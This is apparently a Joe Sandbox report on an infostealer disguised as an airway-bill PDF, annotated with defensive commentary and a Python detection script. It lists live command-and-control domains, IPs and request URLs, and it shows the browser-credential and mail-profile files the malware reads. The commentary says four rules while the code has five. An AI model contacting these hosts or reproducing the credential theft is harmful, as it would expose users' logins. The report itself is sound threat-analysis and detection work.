                      Source: Yara match | File source: 00000012.00000002.3368003513.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000B.00000002.2788912013.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000B.00000002.2807095527.000000001D920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000011.00000002.3370452478.0000000002F00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.2699018066.0000000024B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000013.00000002.3371188324.0000000005980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.2702788304.0000000024FD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\proquota.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\proquota.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\proquota.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                      Source: C:\Windows\SysWOW64\proquota.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\SysWOW64\proquota.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\proquota.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Windows\SysWOW64\proquota.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                      Source: C:\Windows\SysWOW64\proquota.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\proquota.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                      Remote Access Functionality

                      Source: Yara match | File source: 15.2.hdcleziT.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 15.2.hdcleziT.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.hdcleziT.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.hdcleziT.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 11.2.hdcleziT.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 11.2.hdcleziT.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000012.00000002.3370454633.0000000000AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000002.3370291190.0000000000AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000B.00000002.2806584419.000000001A250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000F.00000002.2725067092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000014.00000002.2805235368.0000000000650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000002.3368003513.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000B.00000002.2788912013.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000B.00000002.2807095527.000000001D920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000011.00000002.3370452478.0000000002F00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.2699018066.0000000024B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000013.00000002.3371188324.0000000005980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.2702788304.0000000024FD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      MITRE ATT&CK Matrix (one line per matrix row; cells separated by " | "; a number in parentheses is the count of matching signatures for that technique in this analysis):

                      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts (1) | Native API (1) | DLL Side-Loading (1) | Abuse Elevation Control Mechanism (1) | Deobfuscate/Decode Files or Information (1) | OS Credential Dumping (1) | System Time Discovery (1) | Remote Services | Archive Collected Data (1) | Ingress Tool Transfer (3) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                      Credentials | Domains | Default Accounts | Shared Modules (1) | Valid Accounts (1) | DLL Side-Loading (1) | Abuse Elevation Control Mechanism (1) | LSASS Memory | System Network Connections Discovery (1) | Remote Desktop Protocol | Data from Local System (1) | Encrypted Channel (11) | Exfiltration Over Bluetooth | Network Denial of Service
                      Email Addresses | DNS Server | Domain Accounts | At | Registry Run Keys / Startup Folder (1) | Valid Accounts (1) | Obfuscated Files or Information (2) | Security Account Manager | File and Directory Discovery (2) | SMB/Windows Admin Shares | Email Collection (1) | Non-Application Layer Protocol (4) | Automated Exfiltration | Data Encrypted for Impact
                      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Access Token Manipulation (1) | Software Packing (1) | NTDS | System Information Discovery (136) | Distributed Component Object Model | Input Capture | Application Layer Protocol (15) | Traffic Duplication | Data Destruction
                      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Process Injection (612) | Timestomp (1) | LSA Secrets | Security Software Discovery (321) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | Registry Run Keys / Startup Folder (1) | DLL Side-Loading (1) | Cached Domain Credentials | Virtualization/Sandbox Evasion (2) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Masquerading (11) | DCSync | Process Discovery (2) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Valid Accounts (1) | Proc Filesystem | Application Window Discovery (1) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                      Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Access Token Manipulation (1) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                      IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Virtualization/Sandbox Evasion (2) | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                      Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Process Injection (612) | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph (ID: 1582317; start date: 30/12/2024; architecture: WINDOWS; score: 100)

The graph is reproduced here as an indented process tree. Node numbers are the graph's own; the bracketed figures after a process name are the created-registry-value / created-file badges drawn on that node ("started" = process start, "injected" = code injected into that process).

Top-level network nodes: www.techforcreators.live (68), www.marposet.shop (70), 6 other IPs or domains (72)
Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for submitted file; 12 other signatures

10  Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe [1, 10], started
    DNS/IP: drive.google.com 142.250.186.174 (ports 443, 49709, 49710), GOOGLEUS, United States
            drive.usercontent.google.com 172.217.16.193 (ports 443, 49711), GOOGLEUS, United States
    Dropped: C:\Users\Public\Libraries\hdcleziT.pif (PE32); C:\Users\Public\Libraries\Tizelcdh.PIF (PE32); C:\Users\Public\Tizelcdh.url (MS); 2 other malicious files
    Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Sample uses process hollowing technique
    19  hdcleziT.pif, started
        Signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process
        32  WQzLddwiZR.exe, injected
            43  proquota.exe [13], started
                Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                48  WQzLddwiZR.exe, injected
                    DNS/IP: missvet.net 108.179.193.23 (ports 49993, 49994, 49995), UNIFIEDLAYER-AS-1US, United States
                            www.marposet.shop 188.114.97.3 (ports 49987, 80), CLOUDFLARENETUS, European Union
                            www.techforcreators.live 52.223.13.41 (ports 49988, 49989, 49990), AMAZONEXPANSIONGB, United States
                    Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                52  firefox.exe, started
    22  cmd.exe [1], started
        34  conhost.exe, started
15  Tizelcdh.PIF [5], started
    Signatures: Multi AV Scanner detection for dropped file; Sample is not signed and drops a device driver
    24  hdcleziT.pif, started
        36  WQzLddwiZR.exe, injected
            Signatures: Maps a DLL or memory area into another process; Found direct / indirect Syscall (likely to bypass EDR)
            46  proquota.exe, started
    26  cmd.exe, started
        39  conhost.exe, started
17  Tizelcdh.PIF [5], started
    28  cmd.exe [1], started
        41  conhost.exe, started
    30  hdcleziT.pif, started

Reading the tree top-down: the initial .scr.exe contacts drive.google.com and drive.usercontent.google.com over 443, writes the two .PIF executables and the .url into C:\Users\Public, and hollows a process; hdcleziT.pif then injects into WQzLddwiZR.exe, which starts proquota.exe (a Windows binary name) for the credential harvesting, and a second injected WQzLddwiZR.exe instance carries the C2 traffic to missvet.net, www.marposet.shop and www.techforcreators.live. The two dropped file names are each other's reverse (hdcleziT / Tizelcdh), and Tizelcdh.PIF also appears twice as its own root (nodes 15 and 17), i.e. it is relaunched independently of the initial sample.
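The chain in the graph above (executables dropped into C:\Users\Public\Libraries, a .pif run from there, proquota.exe started by a parent outside C:\Windows and in turn starting firefox.exe, plus the Run-key persistence counted in the ATT&CK matrix) is what a host-side detection should key on. The following Python is an added example written for this page, not Joe Sandbox output and not code from the sample: it runs four rules over a constructed list of Sysmon-style events. File paths and process names are taken from the graph; the Desktop location of the sample, the location of WQzLddwiZR.exe, the SysWOW64 path of proquota.exe, and the Run-key value name and data are assumptions made for the illustration.

```python
import re

# Constructed Sysmon-style events (ids: 1 = process create, 11 = file create,
# 13 = registry value set). Not taken from the report; paths marked "assumed"
# are illustration only, the file and process names come from the behavior graph.
SAMPLE = r"C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe"  # location assumed
SAMPLE_EVENTS = [
    {"id": 11, "image": SAMPLE, "target": r"C:\Users\Public\Libraries\hdcleziT.pif"},
    {"id": 11, "image": SAMPLE, "target": r"C:\Users\Public\Libraries\Tizelcdh.PIF"},
    {"id": 11, "image": SAMPLE, "target": r"C:\Users\Public\Tizelcdh.url"},
    {"id": 1, "image": r"C:\Users\Public\Libraries\hdcleziT.pif", "parent": SAMPLE},
    {"id": 1, "image": r"C:\Windows\SysWOW64\proquota.exe",               # location assumed
     "parent": r"C:\Users\Public\Libraries\WQzLddwiZR.exe"},              # location assumed
    {"id": 1, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "parent": r"C:\Windows\SysWOW64\proquota.exe"},
    {"id": 13, "image": r"C:\Users\Public\Libraries\hdcleziT.pif",       # value name/data assumed
     "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Tizelcdh",
     "data": r"C:\Users\Public\Tizelcdh.url"},
    # benign noise that must not fire
    {"id": 11, "image": r"C:\Windows\explorer.exe", "target": r"C:\Users\Public\Documents\notes.txt"},
    {"id": 1, "image": r"C:\Windows\System32\proquota.exe", "parent": r"C:\Windows\System32\userinit.exe"},
    {"id": 1, "image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\explorer.exe"},
]

PUBLIC = "c:\\users\\public\\"
WINDOWS = "c:\\windows\\"
EXEC_EXT = re.compile(r"\.(pif|exe|scr|com|cmd|bat|url)$", re.IGNORECASE)
RUN_KEY = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run\\", re.IGNORECASE)


def _under(path: str, prefix: str) -> bool:
    return path.lower().startswith(prefix)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, detail) pairs for every event matching one of the rules."""
    hits = []
    for ev in events:
        if ev["id"] == 11:
            # Rule 1: executable-like file written under C:\Users\Public
            if _under(ev["target"], PUBLIC) and EXEC_EXT.search(ev["target"]):
                hits.append(("exec_dropped_in_public", ev["target"]))
        elif ev["id"] == 1:
            image, parent = ev["image"], ev["parent"]
            # Rule 2: a .pif executing out of C:\Users\Public
            if _under(image, PUBLIC) and image.lower().endswith(".pif"):
                hits.append(("pif_exec_from_public", image))
            # Rule 3: proquota.exe started by something outside C:\Windows
            if _basename(image) == "proquota.exe" and not _under(parent, WINDOWS):
                hits.append(("proquota_unexpected_parent", parent))
            # Rule 4: proquota.exe acting as a parent (it started firefox.exe here)
            if _basename(parent) == "proquota.exe":
                hits.append(("proquota_spawns_child", image))
        elif ev["id"] == 13:
            # Rule 5: Run-key value whose data points into C:\Users\Public
            if RUN_KEY.search(ev["target"]) and _under(ev["data"], PUBLIC):
                hits.append(("run_key_to_public", ev["data"]))
    return hits


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:28s} {detail}")
```

The rules are deliberately narrow (Public folder plus .pif, proquota.exe with an unusual parent or child, Run value into Public) so they stay quiet on a normal workstation; the three benign events at the end of the sample list exercise that.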

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label | Link
Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | 26% | ReversingLabs | Win32.Trojan.Generic |
Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | 33% | Virustotal | | Browse

Dropped Files
Source | Detection | Scanner | Label | Link
C:\Users\Public\Libraries\Tizelcdh.PIF | 26% | ReversingLabs | Win32.Trojan.Generic |
C:\Users\Public\Libraries\hdcleziT.pif | 3% | ReversingLabs | |

hdcleziT.pif, the file that performs the injection in the behavior graph, has the lowest static detection (3%, no label); static AV is a weak control for this stage, the behavioral signatures are what catch it.

Unpacked PE Files
No Antivirus matches

Domains
No Antivirus matches

URLs
Source | Detection | Scanner | Label | Link
http://marposet.shop/ | 0% | Avira URL Cloud | safe |
http://www.techforcreators.live/6rby/?TB1lE=2ivW13goMDZZIIgxIXx+PtmXwvlQP7M8TrIp9IEQgHwuZNQL7M/h+QGYEWAJ9fx4B+FPevpSLI/kijRzPjJx+Yn6WZwPBUitPI+kHM7nbQtU8vpWrajM5+kH6naS6tDsldE5bxs=&yt=LNd8mbFxBhGLQV | 0% | Avira URL Cloud | safe |
http://www.techforcreators.live/6rby/ | 0% | Avira URL Cloud | safe |
http://www.missvet.net/htux/?yt=LNd8mbFxBhGLQV&TB1lE=Q5GQh2pDxKbycOBSxf5jPMYccS9RI9gVCLS1zMNZ/AR9Q5msL9GnpCYVVBAJgHuDCTCUS1tunX2/M4ihm7EfJFMVRSEfiRcDq1K8lUuiYdkyOhgpRhKJF9gKDaUZ1llgaIE/O30= | 0% | Avira URL Cloud | safe |
http://www.missvet.net/htux/ | 0% | Avira URL Cloud | safe |
http://www.missvet.net | 0% | Avira URL Cloud | safe |
http://www.marposet.shop/i28d/?yt=LNd8mbFxBhGLQV&TB1lE=HRfyw8S2LmkNqQTdj7e+XySdNCmnttnomENxnEdal27Zyt9OvbxgyEIUd+T7UYt3ulEBayBzfHST035Fo0DtVgaGE1Ztsznh/Pj+8/p9meyljlzEGEhG/wkxevrzOSgU56GIkV0= | 0% | Avira URL Cloud | safe |
http://missvet.net/htux/?yt=LNd8mbFxBhGLQV&TB1lE=Q5GQh2pDxKbycOBSxf5jPMYccS9RI9gVCLS1zMNZ/AR9Q5msL9G | 0% | Avira URL Cloud | safe |
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.marposet.shop | 188.114.97.3 | true | true | | unknown
www.techforcreators.live | 52.223.13.41 | true | true | | unknown
drive.google.com | 142.250.186.174 | true | false | | high
drive.usercontent.google.com | 172.217.16.193 | true | false | | high
missvet.net | 108.179.193.23 | true | true | | unknown
www.missvet.net | unknown | unknown | false | | unknown
www.bellhomehd.shop | unknown | unknown | false | | unknown
www.einpisalpace.shop | unknown | unknown | false | | unknown

The last three domains have no IP and no Active value because no resolution was observed during the run; their "Malicious: false" records an absence of traffic, not a clean verdict. They belong on the same block list as the three domains that were actually contacted.
URLs
Name | Malicious | Antivirus Detection | Reputation
http://www.techforcreators.live/6rby/?TB1lE=2ivW13goMDZZIIgxIXx+PtmXwvlQP7M8TrIp9IEQgHwuZNQL7M/h+QGYEWAJ9fx4B+FPevpSLI/kijRzPjJx+Yn6WZwPBUitPI+kHM7nbQtU8vpWrajM5+kH6naS6tDsldE5bxs=&yt=LNd8mbFxBhGLQV | true | Avira URL Cloud: safe | unknown
http://www.missvet.net/htux/?yt=LNd8mbFxBhGLQV&TB1lE=Q5GQh2pDxKbycOBSxf5jPMYccS9RI9gVCLS1zMNZ/AR9Q5msL9GnpCYVVBAJgHuDCTCUS1tunX2/M4ihm7EfJFMVRSEfiRcDq1K8lUuiYdkyOhgpRhKJF9gKDaUZ1llgaIE/O30= | true | Avira URL Cloud: safe | unknown
http://www.marposet.shop/i28d/?yt=LNd8mbFxBhGLQV&TB1lE=HRfyw8S2LmkNqQTdj7e+XySdNCmnttnomENxnEdal27Zyt9OvbxgyEIUd+T7UYt3ulEBayBzfHST035Fo0DtVgaGE1Ztsznh/Pj+8/p9meyljlzEGEhG/wkxevrzOSgU56GIkV0= | true | Avira URL Cloud: safe | unknown
http://www.techforcreators.live/6rby/ | true | Avira URL Cloud: safe | unknown
http://www.missvet.net/htux/ | true | Avira URL Cloud: safe | unknown

All five URLs are marked malicious by the analysis yet rated "safe" by Avira URL Cloud, so a reputation lookup alone would not have blocked them. The three full URLs share one shape (a four-character path segment, then /? and the TB1lE and yt query parameters, the same yt value in each), which is what to match on in proxy logs rather than the individual strings.
URLs found in memory and binary data
Name | Source | Malicious | Antivirus Detection | Reputation

Sectigo certificate-chain strings. All seven were found in the same memory dumps and are rated Malicious: false, Reputation: high. They are the CRL/OCSP/CPS pointers of an embedded Sectigo code-signing certificate chain; the trailing 0, 0# and 0C characters are the bytes that follow each string in the certificate encoding. They are strings in the binary, not hosts the sample contacted, and they do not make the sample signed (the behavior graph reports it as not signed).
  http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
  https://sectigo.com/CPS0
  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
  http://ocsp.sectigo.com0
  http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
  http://ocsp.sectigo.com0C
  Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmp

Browser search-engine strings in proquota.exe. All eight come from one proquota.exe dump (00000012.00000002.3374453321.00000000076A9000.00000004.00000020.00020000.00000000.sdmp), Malicious: false, Reputation: high. They are browser search-provider configuration read during the browser-data harvesting that the graph attributes to proquota.exe, not outbound activity; pairs such as favicon.ico + search URL are two adjacent strings extracted as one.
  https://duckduckgo.com/chrome_newtab
  https://duckduckgo.com/ac/?q=
  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
  https://www.ecosia.org/newtab/
  https://ac.ecosia.org/autocomplete?q=
  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=

https://github.com/ch2sh/BatCloak | cmd.exe, 00000009.00000002.2427580879.0000000003111000.00000004.00000020.00020000.00000000.sdmp | false | | high
  (A repository URL sitting in cmd.exe memory is a string from the batch stage the loader runs, consistent with that script having been produced with the BatCloak obfuscator; it is not a connection.)

http://marposet.shop/ | firefox.exe, 00000017.00000002.3085974166.0000000019B08000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown

https://drive.usercontent.google.com/ | Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2170331076.0000000000787000.00000004.00000020.00020000.00000000.sdmp | false | | high

https://drive.google.com/ | Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2170331076.000000000071B000.00000004.00000020.00020000.00000000.sdmp | false | | high

http://missvet.net/htux/?yt=LNd8mbFxBhGLQV&TB1lE=Q5GQh2pDxKbycOBSxf5jPMYccS9RI9gVCLS1zMNZ/AR9Q5msL9G | proquota.exe, 00000012.00000002.3372194719.00000000055CC000.00000004.10000000.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000015.00000002.3371539991.000000000319C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown

http://www.missvet.net | WQzLddwiZR.exe, 00000015.00000002.3370132243.000000000096B000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown

http://www.pmail.com0 | Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2168688246.000000007EC8A000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2228426498.0000000021F8B000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.00000000208A0000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2168238016.0000000021EE1000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000002.2522133724.00000000208A6000.00000004.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3369025968.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3372194719.0000000004B9C000.00000004.10000000.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000015.00000000.2753377461.000000000276C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3085974166.00000000193FC000.00000004.80000000.00040000.00000000.sdmp, hdcleziT.pif.0.dr | false | | high
  (www.pmail.com is the Pegasus Mail site; the string is present in the initial sample, both dropped stages and the injected processes, consistent with the mail-credential theft signature on proquota.exe.)

Note that the memory-string rows for missvet.net are rated Malicious: false while the same URL family is rated true in the URLs table above; the per-string rating reflects only where the string was found, so use the URLs table for verdicts.
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
108.179.193.23 | missvet.net | United States | 46606 | UNIFIEDLAYER-AS-1US | true
188.114.97.3 | www.marposet.shop | European Union | 13335 | CLOUDFLARENETUS | true
142.250.186.174 | drive.google.com | United States | 15169 | GOOGLEUS | false
52.223.13.41 | www.techforcreators.live | United States | 8987 | AMAZONEXPANSIONGB | true
172.217.16.193 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false

188.114.97.3 is a Cloudflare address (AS13335) and 52.223.13.41 sits in an Amazon range (AS8987); both are shared front-end infrastructure, so blocking those IPs would also affect unrelated tenants. Block on the domains and URL shape and treat the IPs as supporting context; the Google addresses are the download source the initial sample used and are not themselves indicators.
                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1582317
                                                                            Start date and time:2024-12-30 10:56:09 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 9m 29s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:21
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:3
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@27/8@9/5
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:
                                                                            • Successful, ratio: 98%
                                                                            • Number of executed functions: 77
                                                                            • Number of non-executed functions: 261
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
04:57:01 | API Interceptor | 2x Sleep call for process: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe modified
04:57:21 | API Interceptor | 4x Sleep call for process: Tizelcdh.PIF modified
04:58:35 | API Interceptor | 159637x Sleep call for process: proquota.exe modified
10:57:13 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Tizelcdh C:\Users\Public\Tizelcdh.url
10:57:21 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Tizelcdh C:\Users\Public\Tizelcdh.url
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
108.179.193.23 | appdrivesound.exe | Get hash | malicious | SystemBC | Browse |
188.114.97.3 | RFQ 3100185 MAHAD.exe | Get hash | malicious | FormBook | Browse |
  • www.rgenerousrs.store/o362/
